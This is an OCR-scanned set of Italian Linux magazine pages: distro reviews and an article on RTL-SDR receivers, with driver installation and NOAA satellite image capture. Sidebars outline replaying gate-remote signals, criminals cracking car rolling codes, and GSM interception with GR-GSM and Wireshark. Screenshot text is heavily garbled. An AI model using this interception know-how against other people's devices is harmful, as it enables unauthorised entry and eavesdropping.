Nome Template htosting3.it 
Base | Avanzate Server DNS 


I NUOVI DNS 


Per reindirizzare i visitatori sul nuovo spazio hosting 

dobbiamo procedere alla modifica dei DNS (stiamo an- 
cora utilizzando i DNS del vecchio provider). Accediamo al pannel- 
lo di controllo Silver Linux ed andiamo in Gestione DNS >Server 
DNS. Inseriamo i dati mostrati in figura e confermiamo. 
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Distribuzioni 


FEDORA 26 


' 1 
PA N, fi 
lealibidiciniaibeliA sbirri acta abbiate 


Sii la Libertà, scegli Fedora. È questo il claim che si legge 
nel momento in cui si visita il sito Web ufficiale del proget- 
to Fedora. E, dopotutto, non è una frase campata in aria: nel 
corso degli anni, infatti, la distro si è dimostrata quella che più 
di tutte ha abbracciato il concetto di FOSS, includendo esclu- 
sivamente software di questa tipologia. Ma Fedora, com'è noto 
a molti, è anche stabilità, innovazione e sicurezza. Cosa c'è di 
nuovo in questa release 26? Nella versione Workstation, quella 
destinata ai “comuni” PC, troviamo il nuovo ambiente desktop 


fedora 26 


COME UTILIZZARE IL DVD-ROM 


£ 


GNOME 3.24 ed una quantità di aggiornamenti per nulla irrile- 
vante: ad esempio, sofio stati integrati i nuovi Python 3.6, GCC 
7 e Golang 1.8. Anaconda, il software di installazione predefi- 
nito di Fedora, ha ora un nuovo strumento di partizionamento 
che permette anche ai più esperti di configurare le partizioni 
del disco come più preferiscono. Come al solito, oltre alla 
release Workstation, sono disponibili anche la versione Server 
e Atomic (quest’ultima ottimizzata per l’implementazione di 
workload su container). 


Default Applications 
Removable Media 


Fedora 26 


e | localhost-live 
2068 
Intel® Core” 15-4200U CPU © L60GHz x 2 
abit 
Gallium 0,4 on llumplpe (LLVM 3.9, 256 bits) 
ME_ Version 3.240 
2atton Oracle 
& Obytes 


Check for updates 
it È 


Le distribuzioni principali presenti all'interno del DVD-Rom sono direttamente avviabili dal supporto digitale, quindi installabili o 
eseguibili in modalità LIVE. Basta inserire il DVD-Rom nell'apposito lettore e riavviare il PC. Dopo pochi secondi apparirà l'inter- 
faccia per l'avvio della distribuzione o per la sua esecuzione in modalità LIVE. Per tutte le altre basta seguire le seguenti istruzioni. 


DVD Rom - Lato B 
Ottobre 2013 
N° 149 


L'INTERFACCIA 


Per le distribuzioni disponibili sotto forma diimmagini ISO, apriamo il 
DVD-Rom con il file manager e clicchiamo due vole sul file index.htm. 
A questo punto, dovrebbe apparire l'interfaccia di gestione. Clicchiamo 
sull’illustrazione o sulla voce Distribuzioni presente nel menu a destra. 
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Indice di /media/backupi x 


© |D file///media/backup/Distribuzioni/dvd-10-149-b/distribuzioni/ 


Indice di /media/backup/Distribuzioni/dvd-10-149-b/distribuzioni/ 


Nome Dimensioni 
fi [directory principale] 


Data ultima modifica 


Kubuntu-12.04,3/ 
Ubuntu-12,04.3/ 


20/08/13 12:25:57 
20/08/13 12:30:01 


DOWNLOAD ISO 


Da qui, possiamo scaricare l'immagine ISO della distribuzione semplicemente 
accedendo alla sua eventuale cartella e premendo sul relativo link. Dopodiché, 
possiamo masterizzare l'ISO su Cd-Rom e DVD-Rom per creare il supporto di 
installazione o trasferirla su una pendrive USB bootable. 


Distribuzioni 


PARROT SECURITY OS 3.7 


ARA E NT ENT ni te GIA ZI Ma i O 


ata nell'ormai relativamente lontano 2013, Parrot 

Security OS è una distro (orgogliosamente sviluppata 
da un team italiano) che mette a disposizione degli esperti 
di sicurezza tutti i tool necessari per il test di' dispositivi, 
reti e servizi. Ed oggi, con la nuova release 3.7, la distro 
diviene ancora più completa. Come annunciato nelle release 
note, infatti, se il primo passo era quello di realizzare una 
distribuzione leggera, basata su Debian e con un ambiente 
desktop “classico” che non mettesse in difficoltà gli utenti, 


(x} Brasero 


Progetto Modifica Strumenti Aiuto 


Progetti recenti: 


| Creare un nuovo progetto: 


, Progetto audio Im-138.iso 


Crea un CD audio tradizionale Mageia-2-1586-DVD.iso 
KNOPPIX_V7.0.1DVD-2012-05-24-EN 
Progetto dati 


= Im-137-b.iso 
|=]| Crea un CD o DVDdi dati 


linuxmint-13-mate-dvd-32bit.iso 


Progetto video 
Crea un DVD video o unSsVeDn 


Copia disco 
Crea una copia 1:1 di un CD/DVD 


x Masterizza immagine 


! Masterizza un'immagine CD/DVD esistente su disco 
è 


MASTERIZZAZIONE SUPPORTI 


In ambiente Gnome possiamo utilizzare Brasero, su KDE K3b. Nel primo 
caso, avviamo il software, clicchiamo su Masterizza immagine e selezio- 
niamo l'ISO da masterizzare. Con K3b, invece, clicchiamo su Strumenti/ 
Masterizza immagine ISO e selezioniamo l'immagine ISO. 


il secondo step consisteva nell’integrare un elevatissimo 
numero di strumenti utili ad esperti di sicurezza, sysadmin 
e sviluppatori. Obiettivi ampiamente raggiunti. Cosa c'è di 
nuovo in Parrot Security OS 3.7? Essenzialmente, le grandi 
novità sono 2: la prima riguarda il kernel, la seconda il core 
della distro. Nel primo caso, infatti, gli sviluppatori hanno 
sostituito Linux 4.9 con il nuovo ramo 4.11 raggiungendo un 
miglior supporto per molti dispositivi. Nel secondo, invece, 
la distro è ora basata su Debian 10. 


[x] UNetbootin 


{ Distribution == Select Distribution == == Select Version 


Benvenuti in UNetbootin, il Netboot Installer universale. Uso: 
1. Selezionare dalla lista qui sopra una distribuzione ed una version 


specificare manualmente i file da caricare qui sotto. 
2. Selezionare un tipo di installazione e fare clic su OK per iniziarla. 


©. Diskimage 
© Custom 
Options: 
TT Show All Drives (Use with Care) 


“| Drive: Cass >] OK | | 
PENDRIVE USB AVVIABILE 


Installiamo UNetbootin (ht{p:/unethootin.sourceforge.nelì. Colleghia- 
mo la pendrive USB al PC, selezioniamo Diskimage e premiamo su “... 
per trovare l'ISO. A questo punto, clicchiamo su 0K e aspettiamo che ta 
procedura termini. Subito dopo avviamo il PC da periferica USB. 


Type: |Drive USB 
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Lo sniffer 
dell'etere 


Nell'aria viaggiano tonnellate di comunicazioni non criptate 
trasmesse via radio. Alcune private, altre pubbliche, altre segrete. 
Scopri con noi come intercettarle col tuo PC 


5 è stato un periodo nel quale l’informatica amato- 
riale consisteva soprattutto nel costruire hardware 
in casa: in tutto il mondo, piccoli grandi hacker 

cercavano di capire come funzionassero i primi micropro- 
cessori per costruire ad esempio un calcolatore capace di 
accendere a comando un paio di lampadine. Poi, sono arri- 
vati i computer a “basso costo” e l’attenzione degli hacker 
si è spostata principalmente sul software. In modo graduale 
ci si è allontanati dal lavorare sull’hardware, accettando 
più che altro quello che veniva venduto dalle varie aziende, 
senza provare a modificarlo per scoprirne nuove funzionali- 
tà. Naturalmente, questa passione non si è interrotta: negli 
anni è solo diminuito il numero di persone che fa hacking 
hardware attivamente. E comunque tutt'ora, un vero appas- 
sionato di informatica non può non avere anche delle basi 
di elettronica. Anzi: negli ultimi tempi, soprattutto grazie alla 
comparsa di dispositivi hardware altamente configurabili 
come Arduino e Raspberry Pi, diversi hacker stanno nuova- 
mente tornando alle origini. 


® 
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se 
#6 se Linux Magazine 


Luca Tringali 


Sara Mede 
Fig. 1- Ecco una tipica chiavetta RTL SDR è acquistabile sul Web 
al costo di circa 10 euro 


DALLE RADIO Al PC... 


I primi hacker hardware erano quasi sempre radioamatori, 
sia perché la tecnologia delle radio è abbastanza semplice 
ma al tempo stesso permette di imparare a costruire circuiti 
anche più complessi, sia perché la possibilità di comunicare 
a grande distanza o di intercettare le comunicazioni di al- 
tre persone ha sempre affascinato chiunque da quando Gu- 
glielmo Marconi ha dimostrato un metodo pratico per farlo. 
Oggi, le onde radio sono utilizzate praticamente ovunque, 
non fosse altro che per il desiderio comune di liberarsi delle 
connessioni cablate: il Wi-Fi, ad esempio, sfrutta un insieme 
delle tecnologie progettate da Marconi e Tesla. Ma già negli 
anni’80, con i primi telefoni cellulari, Ie onde radio stavano 
prendendo piede. Naturalmente i primi telefoni mobili erano 
tutt'altro che sicuri, le comunicazioni con i ripetitori di se- 
gnale non erano criptate, quindi non c’è voluto molto perché 
alcuni hacker scoprissero di poterle intercettare con estrema 
facilità. L'esperto di sicurezza Tsutomu Shimomura e l’ha- 


Firefox Web Browser 


Flight. Altitude Speed 


Li http/localhost:8090/ 
€ (ebtocalhost * @| [Bi coogle lea 


} Dump1090 
* Newark-ort- Trent 


ne 3 planes on screen 


ICAO: 40065 


Speed: 401 knots 


sinto Coordinates: 52.321799, 
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Stowbrdgis 
Kidderminatera 


Fig. 2 - Con dump1090 si ottengono i dati dei transponder degli 
aeroplani che ci sorvolano 


cker Kevin Mitnick avevano scoperto, quasi contempora- 
neamente, la possibilità di modificare un modello di telefono 
cellulare dell’epoca per trasformarlo in uno scanner capace 
di intercettare tutte le comunicazioni mobili di un’area anche 
abbastanza vasta. Ovviamente, l’utilizzo di questa funziona- 
lità era illegale, e Mitnick venne arrestato. 

Più recentemente si è sviluppato, in modo legale, il mondo 
degli SDR, le Software Defined Radio. | radioamatori sono 
pian piano passati dalla radio analogica a quella digitale. Ma 
il principio di base non cambia: una radio è sempre un cir- 
cuito oscillante composto da una resistenza, una bobina ad 
induttanza variabile e un condensatore variabile. 

Tuttavia, controllando induttanza e capacità in modo digi- 
tale, con un programma ed un microprocessore invece che 
girando manualmente delle manopole fisiche, è possibile 
avere molto più controllo sulla trasmissione ed anche sul- 
la ricezione. Uno dei vantaggi fondamentali dell’utilizzo di 
software per i radioamatori è la possibilità di analizzare lo 
spettro che si sta ricevendo, per andare alla ricerca di nuovi 
segnali da analizzare e scoprire. Ciò lo si poteva fare anche 
prima grazie all'uso di oscilloscopi analogici, ma il digitale 
permette di ottenere proprio la visione che si desidera, che 


sia un dettaglio oppure una vista d’insieme di una banda di 
frequenze. Questa funzione è ovviamente molto utile per un 
hacker. Naturalmente, per trasmettere su onde radio è ne- 
cessario avere un brevetto da radioamatori, ma per ricevere 
(e quindi analizzare) le frequenze emesse dai vari dispositivi 
che ci cireondano non occorre alcuna autorizzazione. Un ri- 
cevitore professionale, però, può costare parecchio e quindi 
un semplice hacker potrebbe non poterselo permettere. 

Per fortuna, esiste un dispositivo molto più semplice: la sigla 
con cui è noto è semplicemente RTL (o RTL SDR). Si tratta 
di un semplice ricevitore USB per radio e televisione dal co- 
sto di circa 10 euro. Ne esistono di diversi produttori, perché 
ovviamente il chip (chiamato 820T2, con driver RTL2832U 
—- assicuriamoci che il nome sia questo quando acquistiamo 
una chiavetta RLT on-line) è stato adottato da diverse azien- 
de. Il vantaggio più importante di questo chip, oltre al basso 
costo, è che il codice sorgente dei driver è stato pubblicato, 
quindi alcuni appassionati hanno potuto svilupparne un'ap- 
posita versione per GNU/Linux che rimuove le varie limitazioni 
e garantisce un accesso diretto al sintonizzatore, permetten- 
do quindi all’utente di utilizzare il dispositivo come un vero 
e proprio scanner dell'etere. È possibile sintonizzare questo 
ricevitore su frequenze che vanno dai 27 MHz agli 1,7 GHz, 
cioè tutta la banda di VHF ed una buona parte di UHF (la 
quale convenzionalmente arriva a 3 GHz). Non si può inve- 
ce utilizzare per Wi-Fi e Bluetooth, che lavorano sui 2,4 GHz. 
Sfruttando la banda degli RTL è possibile intercettare molti 
tipi di dispositivi differenti. Prima di vedere quali, proviamo ad 
installare i driver modificati. 


I DRIVER PER L’RTL SDR 


I “driver da hacker” devono essere compilati, come piace ad 
ogni buon smanettone. È una procedura molto semplice e 
basta seguire un paio di comandi. Prima di tutto si installano 
i programmi necessari alla compilazione del codice sorgente: 


sudo apt-get install git 
sudo apt-get install nano 
sudo apt-get install build-essential cmake 


COSÌ TI CLONANO IL TELECOMANDO... 


Una delle cose che si possono fare 
con un RTL SDR è analizzare il com- 
portamento dei radiocomandi, come 
quelli dei cancelli automatici. Questi 
radiocomandi, infatti, non fanno altro 
che inviare degli impulsi radio, che 
possiamo ricevere con un RTL e una 
apposita antenna (vanno bene anche 
le piccole antenne a dipolo per tele- 
visione, o quelle di una radio). Ovvia- 
mente, registrando questo segnale, 


e poi ritrasmettendolo, è possibile 
aprire il cancello! Il segnale non è altro 
che un flusso audio, che si può quindi 
registrare come file .wav. La stessa 
logica funziona per le chiusure centra- 
lizzate delle automobili, che in genere 
funzionano sulla stessa frequenza 

di un cancello (possiamo comunque 
verificarlo con un programma come 
Gqrx, visualizzando lo spettro attorno a 
tale frequenza). In genere, comunque, 


le chiavi dispongono di un sistema di 
sicurezza basato su un algoritmo che 
cambia volta per volta il codice inviato 
(rolling code), quindi ripetere un flusso 
audio registrato non farebbe aprire le 
porte dell'automobile. Alcuni criminali, 
però, studiano questi flussi audio per 
risalire all'algoritmo e quindi per poter 
calcolare il nuovo codice. Maggiori in- 
formazioni sono disponibili sulla pagina 
Web www.edmaster.it/url/6989. 
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Su un sistema Debian like (Ubuntu, ad esempio) sono sol- 
tanto 3 pacchetti. Poi, è anche necessario installare la libre- 
ria per sviluppatori LibpUSB, che permette un accesso diretto 
alle periferiche USB (come '°RTL SDR, che è per l’appunto 
una chiavetta USB). Lo si può fare con il comando: 


sudo apt-get install libusb-1.0-0-dev 


È ora arrivato il momento di scaricare il codice ufficiale del 
driver RTL SDR: 


git clone git://git.osmocom.org/rtl-sdr.git 


Prima di iniziare la compilazione vera e propria del codice, 
controlliamo che sia davvero tutto pronto: 


cd rtl-sdr/ 

mkdir build 

cd build 

cmake ../ -DINSTALL UDEV_RULES=ON 


Se non vengono presentati messaggi d’errore (nel qual caso 
bisogna verificare i requisiti espressi nel messaggio), si può 
cominciare la compilazione con il semplice comando: 


make 
E i driver possono poi essere installati con: 
sudo make install 


Ovviamente, in questo caso stiamo parlando di un comando 
che richiede i privilegi di amministrazione, per questo è pre- 
ceduto da sudo. 

Bisogna poi procedere con l'aggiunta di alcune regole spe- 
ciali, che riguardano il funzionamento del dispositivo RTL 
SDR. Sono sufficienti 2 comandi: 
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Antenna circolare per NOAA e ACARS DIAMOND KE 137 QFH - SM TECHNOLOGY 


20 Nuoro BE EDTI MAr a Cut rn 


1 com 


© geranzia cliente eBay 


EUR 234,22 


Comprato Subito 


Aggiungi al carrello 


Informazioni sul venditore 
amarcnmatoggat (107 gf} 


Fig.3- Le antenne per i satelliti NOAA si possono acquistare 
anche su eBay, ma costano molto. Con il fai da te si spendono 
meno di 20 euro 


sudo ldconfig 
sudo cp ../rtl-sdr.rules /etc/udev/rules.d/ 


La procedura è quasi completa: dobbiamo specificare, al 
sistema operativo, che il driver “originale” non deve essere 
caricato. Per farlo basta utilizzare l’editor di testi nano per 
creare un apposito file: 


sudo nano /etc/modprobe.d/blacklist-rtl.conf 
All’interno di questo è necessario scrivere la riga: 
blacklist dvb_usb_rt128xxu 


e salvare il file premendo Ctrl+O e Invio. Infine, possiamo 
chiudere l’editor di testi con Ctrl+X. Affinché le nuove mo- 
difiche vengano applicate, è necessario riavviare il compu- 
ter (cosa che si può fare anche dal terminale lanciando il 
comando sudo reboot). Ora, abbiamo modificato il sistema 
operativo affinché possa sfruttare tutte le potenzialità degli 
RTL SDR. Se inseriamo il nostro RTL SDR in uno degli in- 
gressi USB disponibili e lanciamo da terminale il comando: 


UN RADIOTELESCOPIO AMATORIALE 


Qualsiasi astronomo amatoriale può 
permettersi un piccolo cannocchiale 
con cui osservare corpi celesti non 
troppo lontani, la Luna in particolare e 
‘qualche pianeta del sistema solare. Per 
osservare le stelle ovviamente servono 
mezzi molto più costosi. Però scattare 
fotografie del Cosmo non è tutto ciò 
che un astronomo dilettante possa 
fare, anzi: è vero che le stelle emettono 
della luce visibile, ma emettono anche 
onde radio che possiamo captare con 
un RTL. E queste onde radio ci danno 
informazioni preziose riguardo le so- 
stanze presenti su un particolare corpo 
celeste, ad esempio l'idrogeno. Non 
solo: sempre sfruttando le onde radio 


possiamo registrare l'ingresso nell'at- 
mosfera terrestre di varie meteoriti [ce 
ne sono tante, di piccole dimensioni, 

che ci colpisco la Terra in continuazione 
senza neppure accorgercene]). Per poter 
analizzare questo tipo di fenomeni serve 
un disco a parabola (in modo da ampli- 
ficare il segnale] e con un costo di circa 
200 euro si può ottenere quello che di 
fatto è un radiotelescopio capace di fare 


concorrenza a quello di molte università. 


Ovviamente, la parabola va poi diretta 
verso ciò che si vuole osservare: per 
fortuna, esistono diverse applicazioni 
Android che ci indicano la posizione 
delle principali costellazioni. L'osser- 
vazione può essere fatta sia durante la 


notte che di giorno, proprio perché la 
luce visibile del Sole non ostacola troppo 
la visione delle onde radio delle stelle 
più lontane. Trasformare il segnale 
registrato dall'SDR in un grafico dello 
“spettro di emissione” di una stella, utile 
ad esempio per osservare la famosa “li- 
nea dell'idrogeno” [che è il combustibile 
nucleare delle stelle] è estremamente 
facile grazie a GNU Radio. Si tratta del 
programma SDR più evoluto in assoluto 
e consente di manipolare i flussi ricevuti 
per poterli analizzare in modo totalmen- 
te automatico. Per realizzare questo 
progetto, le informazioni disponibili 
sulla pagina Web www.edmaster.it/url/6992 
si riveleranno molto utili. 


rtl test -t 
dovremmo ottenere un output del tipo: 
Found 1 device 


Ciò significa che il dispositivo è stato riconosciuto perfetta- 
mente dal sistema. A questo punto possiamo cominciare a 
domandarci cosa possiamo fare con un RTL SDR. Ed a breve 
ne scopriremo delle belle. 


I SATELLITI METEOLOROGICI 


Tra le varie applicazioni interessanti del ricevitore RTL SDR, 
noi abbiamo scelto l’intercettazione dei satelliti meteorologi- 
ci. Tutti siamo abituati a vedere, sia in televisione su Internet, 
le previsioni del meteo. Queste previsioni vengono realizzate 
dai meteorologi utilizzando diversi strumenti: uno di questi 
sono le preziose fotografie scattate dai satelliti che, in tem- 
po reale, mostrano una grande area del globo terrestre vista 
dall’alto. Per i meteorologi, il vantaggio di queste immagini 
sta nel fatto che offrono una chiara visuale delle nuvole e 
del loro spostamento, quindi è possibile capire come evol- 
veranno eventuali precipitazioni. Ma sono anche immagini 
piacevoli da guardare: in televisione vengono mostrare quasi 
sempre ed è incredibile pensare che possiamo permetterci di 
osservare il nostro stesso pianeta dall'esterno, cosa che fino 
a meno di un secolo fa sarebbe stata considerata completa- 
mente assurda. 

Tutti sognano di andare nello spazio per vedere la Terra 
dall’alto. Ma diventare astronauti non è da tutti. Con un RTL 
SDR però possiamo scattare con facilità una foto satellitare 
del globo terrestre. | vari satelliti meteorologici, infatti, invia- 


no in continuazione le immagini in tempo reale, quindi basta 
aspettare che uno di loro si trovi sopra la nostra città, ad 
esempio, e intercettare le immagini che invia. Esistono due 
tipi fondamentali di satelliti meteorologici ad accesso libe- 
ro: i NOAA ed i Meteor M2. | primi sono più semplici da 
intercettare, ma hanno immagini a più bassa risoluzione, i 
secondi sono un po’ più complicati ma offrono immagini più 
dettagliate. Noi presentiamo la procedura per i NOAA, anche 
se di fatto si possono usare gli stessi strumenti anche nel 
caso dei Meteor M2: essenzialmente, basta la stessa anten- 


IL CARO E VECCHIO GSM 


I telefoni GSM sono praticamente scomparsi: i moderni 
smartphone utilizzano tecnologie ben più avanzate che 
prevedono la crittografia per prevenire eventuali intercet- 
tazioni. Possiamo comunque procurarci un telefonino GSM 
acquistandolo sul Web a pochi euro e ripercorrere le orme 
di Mitnick, senza però finire in carcere come lui (conside- 
rato che il telefonino è il nostro). Un dispositivo RTL può 
essere utilizzato infatti anche per intercettare i segnali 
GSM, utilizzando un'antenna omidirezionale da televisione 
o una di quelle che abbiamo consigliato per 'ADS-B. Basta 
direzionarla verso il telefonino che vogliamo intercetta- 
re, regolando il ricevitore sui 900 MHz. Il programma più 
semplice, per farlo, è probabilmente GR-GSM: il flusso di 
informazioni prodotto da esso può poi essere inserito in 
Wireshark [programma noto agli esperti di sicurezza infor- 
matica) per analizzare i pacchetti e decodificare almeno le 
informazioni fondamentali. Tutti i dettagli sono disponibili 
sulla pagina Web www.edmaster.it/url/6993. 
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Costruiamo un'antenna Double Cross 


La guida passo-passo per realizzare in casa e a costo quasi zero un'antenna a polarizzazione 
circolare capace di intercettare i dati meteorologici 


ta 


Q$0802-Martes04 


Per intercettare i satelliti NOAA 
abbiamo bisogno di una antenna a 
polarizzazione circolare. Possia- 
mo realizzarne una con il modello 
"Double Cross", cioè a doppia croce. 
Si tratta di realizzare quattro dipoli. 


Si comincia prendendo un cavo coassiale e sbucciandolo con cura per separare 
la calza esterna dal conduttore interno. La calza esterna va saldata ad un 
cilindro di alluminio, il conduttore interno ad un altro cilindro di alluminio. 

I due cilindri vanno isolati perché non devono essere in contatto tra loro. 


I due cilindri vanno poi allineati aiutandosi con 
un bastoncino di legno rigido e usando anche del 
nastro adesivo (quello utilizzato dagli elettricisti, 

il nastro isolante, è perfetto per questo scopo). 
Contrassegniamo poi i due cilindri per identificare 
subito quello connesso al connettore interno. Infatti, 
è fondamentale per fissare correttamente i dipoli e 
far sì che l'antenna possa funzionare correttamente. 
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Per fissare il dipolo è sufficiente una barra di legno 
sulla cui estremità fare due fori col trapano. 


Dimensioni ideali di ogni cilindro di alluminio: 

- diametro: 0,95 cm 

- lunghezza: 48,1 cm 

Un dipolo deve essere distante dall'altro di 54,6 cm. 

Il vantaggio di questa antenna è che funziona anche se 
la costruzione non è impeccabile, però è fondamentale 
collegare gli elementi dei dipoli come mostrato nello 
schema qui a destra. 


The coax center conductortconnects to the upper element of each dipole. 


Dipole #1 Dipole #2 Dipole #3 


Ferrite beads 
over each 
coax 


These two coax 
lines are the 
same length of 
500 


These two coax lines 
are the same length of 
50 .Q and are each 1/4 A 
longer than the lines to 
dipoles 1 and 2 


QS0802-Martes09 50.0 coax to receiver 


Possiamo fissare i vari dipoli sulle barre di legno 
utilizzando del comune spago. A loro volta, le barre 
di legno (che rappresentano la struttura portante 
dell'antenna) vanno assemblate a croce: com'è pos- 
sibile notare in figura, ogni dipolo deve formare un 
angolo di circa 30° con l'asse verticale. 


Una descrizione approfondita dell'antenna Double 
Cross che abbiamo realizzato è disponibile sulla pagina 
Web htip://tinyurl.com/doublecrossNOAA 
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na a polarizzazione circolare e che, come abbiamo già sco- 
perto, è molto semplice da costruire. Ogni satellite ha una 
traiettoria diversa: uno di quelli che passa spesso sull’Italia 
è il NOAA19, che offre anche buone immagini ed è facile da 
identificare. La prima cosa da fare, ovviamente, è scoprire in 
che intervallo di tempo il satellite passa sopra la nostra testa 
ed è quindi in grado di farci arrivare il suo segnale. 


IL “PROBLEMA” DELLA FREQUENZA 


Ogni satellite ha una frequenza di lavoro diversa, ma per for- 
tuna queste vengono segnalate sia da Gpredict che da Gqrx, 
quindi è facile sapere quale sia quella giusta per il satellite 
che vogliamo intercettare al momento. Inoltre, ogni satellite 
passa sopra lo stesso punto più volte (2-3 volte) in uno stes- 
so giorno, quindi possiamo effettuare diversi tentativi. C'è 


Quando passerà il satellite? 


Utilizzando Gpredict possiamo sapere quando un satellite passerà sopra la nostra testa 


Aggiornamento TLE dalla retek 
Fetching visual.txt 
IRREZIE FESTA TIA 

Satellites updated: 0 


Next: FO-29 Satellites skipped: 0 
în 09:35 Missing Satellites: 0 16,66* 


= 


Footprint : 6079 km 
LE Altitudine : 800 km 
Velocità : 7,452 km/sec 
Dopplern@100M : 1240 Hz 
Sig. Loss : 150,77 dB 
Sig. Delay © 27,65 msec 
Mean Anom. ; 115,09” 
Fase orbitale : 161,84 
Orbit Num. : 124439 
Visibilità : Luce diurna 


AGGIORNAMENTO 

Prima di tutto è necessario installare il pro- 

gramma gpredict. Avviato quest'ultimo, si deve 
aggiornare (tramite connessione Internet) il database, 
cliccando sul menu Modifica/Aggiorna. In pochi minuti 
dovrebbe essere tutto pronto. 


D satettit Nome Trieste 


Descrizione | Trieste 


Trieste. Italy 


Satelinà Matvdine | «6500 © Nord v LI 
eli 
sarele N Mi 
sata #50) Longiudine () 127500 podi <" SIR 
ì ine 
19980) Locator esp 
10080) Atinudine 20 Imai 
1980) Westherst  LIVT i Seleziona 
dti È 
o 20159] Grici | O È 
Br, È 
569 Delay : 1219 mene 
Mean Ano. : 16800" 
Fase orbitale : 236.30* 
Orbit Nunn. : 43497 
Visibilità + Luce diurna 
Prede mi o0:-9050%a «+2 


Nella stessa finestra di selezione dei satelliti 

dobbiamo anche indicare la nostra Ground sta- 
tion, cioè la posizione in cui ci troviamo. Il software co- 
munque contiene già l'elenco di tutti i capoluoghi di pro- 
vincia italiani, basta scegliere il nostro. 
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tà n 


Ground Station |**DEFAULT** 


Satelliti 


Cerca noaa Hint: Double click on any satellite 


to move it to the other box, 


Gruppo | Tutti satelliti v 


sola Ù Satelliti Disponibili Satelliti Selezionati è RASOI 

NOAA 1411 HO:68 4 

NOAA 19 13 -JOA 

NOM2[] 2) NOAA16 

NOAA3]] €) (NOAA 

NORA4[] i Sas 

NOAASH < ® 509 

3 Proprietà annulla VALI 


Sig. Delay : 27,04 msec 
è Mean Anom. ; 84,56* 
nds Fase orbitale ; 118,91° 
Orbit Num. : 24177 
Visibilità : Luce diurna 


RATE e CI LTD 


CONFIGURAZIONE 


L'interfaccia contiene, nella parte superiore, il 

visualizzatore dei satelliti: basta cliccare sul pul- 
sante a forma di triangolo presente in alto a destra [vicino 
alla X) e scegliere la voce Configura per poter scegliere i 
satelliti che ci interessano (i NOAA, in particolare). 


ste n Nest: NOMA 15 


n 0114:23 w NOAA 19 


Visualizza ll prossimo transito 


Iss 
NOAA 15 
> NOAA1G 
NOAA 17 
NoMA is 


© Noa 19 
Orbit Num. : 43497 
Visibilità : Luce diurna 


UNITE ER DICCI ii 


PROSSIMI TRANSITI 
04 A questo punto, possiamo scegliere ufi satel- 
lite cliccando sullo stesso pulsante a forma di 
triangolo relativo però al riquadro in basso a destra. Per 
sapere quando passerà sopra di noi, basta scegliere la 
voce Prossimi transiti. 


Intercettiamo il satellite 


Utilizziamo Gqrx per registrare gli impulsi audio inviati da un satellite NOAA 


Configure 1/0 devices 


871.000 000 


1/Q Input 
Device | Realtek RTL2838UHI © 


Device string |rti=0 


shape Normal 

Input rate | 2560000 Mode | Demad Off 

Declmation | 32 £ AGC Fast È 
Sample rate 80.000 ksps «quelchi —— -150,0d8F5|* A 


Bandwidth | 0,000000 MHz alanker| N81 N82 


LNB LO |0,000000 MHz 


Audio output 
Device | Default 


Sample rate | 48.kHZ 


Cancel ok 


VIPEIIBBTITITTESMITTASI IERI PIRIIROERTIVIATERTIRTCRERRASTEReRIRCA#iFiofgort 


Se è la prima volta che utilizziamo Gqrx sarà 

probabilmente necessario configurare il ricevi- 
tore (che dovrebbe comunque essere riconosciuto auto- 
maticamente]). Tutto quello che dobbiamo fare è indicare 
un input rate: optiamo per 2560000. 


FEEBEEEFOÙ 


TIEbiE GC FE 


Impostiamo la frequenza standard del satellite 
che vogliamo intercettare: ad esempio 137.100 
000 MHz per il NOAA19. Però la frequenza cambia man 
mano che il satellite si sposta, quindi bisogna reimpostarla 
cliccando sul picco dell'onda che appare nel visualizzatore. 


Reni me tutte dere 
Reni i tele ter 


Afrea iaia 
Mivar sione raf aRrmeento 


È Bibera shcronizzaridha vare 


Aggiungi eticpetta a eievone 


Modifica etchete 


Ora che abbiamo una traccia mono, possiamo proce- 
dere ad impostare nella casella in basso a sinistra 


la giusta frequenza: scegliamo 11025. Fatto ciò, clicchiamo su 
Tracce/Ricampiona, confermando questa nuova frequenza. 


Swap ia No limits 


BE DC remove ® \Qbalance 


Freg:cortection [0,0 pom 
Antenna Rx 


Regal Gplians | nputcontrot | FFTSeltinga È 
auf 
Bockmarts 

Moddation Bandwidth Tag 
WFM (mono) 40000 APT 
sura (mona) 160009 SRISTV 


Frequency Name 
4 137921500 NOAA18 
5 145800000 1ISSSTV 
6 145800000. ISS AFSK Packet WIFM (mono). 160000. ISSAFSK 
1° 145825000 | HSAPRS VATM (mona) 160000 ISKAPRE 


a 937000000. 166 FM Volce WEM lmono) 1160000‘ iSS/MVolce 
FINTEIRIFIOMATTA E IENA ITA 


Nella finestra principale indichiamo i parame- 

tri Filter Width = Wide, Filter Shape = Normal, 
Mode = WFM (mono), Frequency Bar = 0.000 kHz per la 
scheda Receiver options. È possibile provare a modifica- 
re altri parametri per migliorare il segnale. 


RESOR RETE 


4 
dili9_.. [[7 Ra nici È; AIPI2I0! 


Frequenza Aicora a " Dire Sung 
Gas DONGOMADAS 


Con Gqrx possiamo registrare il file audio ap- 

pena sentiamo il bip del satellite. Il file può poi 
essere aperto con Audacity per essere migliorato: oltre 
a tagliare le parti di silenzio, clicchiamo sul menu Trac- 
ce/Da traccia stereo a mono. 


(88) Rimuovi offset DC (centra su 0.0 verticalmente) 
Mî) Normalizza massima ampiezzaa -10 dB 


{] Normalizza canali stereo indipendentemente 


Gestisci || Anteprima (I 


Infine, clicchiamo su Effetti/Normalizza, per ottene- 
re un audio normalizzato. Il risultato va poi esportato 
come file WAVE a 16 bit. Queste correzioni con Audacity non 
sono fondamentali, ma migliorano la resa delle immagini finali. 


eee 
(ti 
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un particolare da non sottovalutare, però: l’effetto Doppler. 
A causa di quest'ultimo, la frequenza di trasmissione dei sa- 
telliti è in continuo cambiamento: man mano che si avvici- 
nano, le frequenze diventano più alte; quando si allontanano 
da noi, le frequenze diventano più basse. | cambiamenti non 
sono enormi, però si notano. 

Il visualizzatore di Ggrx ci mostra lo spettro radio in tempo 
reale, con il picco di maggiore trasmissione: per sintonizzarsi 
esattamente su di esso basta cliccarci sopra. Probabilmen- 
te, anche durante la registrazione dell’audio, dovremo con- 
tinuamente inseguire il picco cliccandovi sopra, in modo da 


Dall’audio alle immagini 


avere sempre la migliore qualità possibile del segnale. 


I SATELLITI METEOR 


Intercettare i satelliti Meteor, in particolare il Meteor M2, 
come già. detto, non è troppo diverso dalla procedura che 
abbiamo descritto per i NOAA. | satelliti del NOAA sono stati 
sviluppati dall'agenzia meteorologica statunitense, mentre 
i Meteor da quella sovietica, già negli anni ‘80. Attualmen- 
te, i satelliti Meteor sono i più avanzati, offrono immagini di 
migliore qualità e più informazioni, però sono anche un po’ 


WxTolmg ci permette di convertire l'audio del satellite in fotografie 


WxXtolmg Downloads FERRERO N 
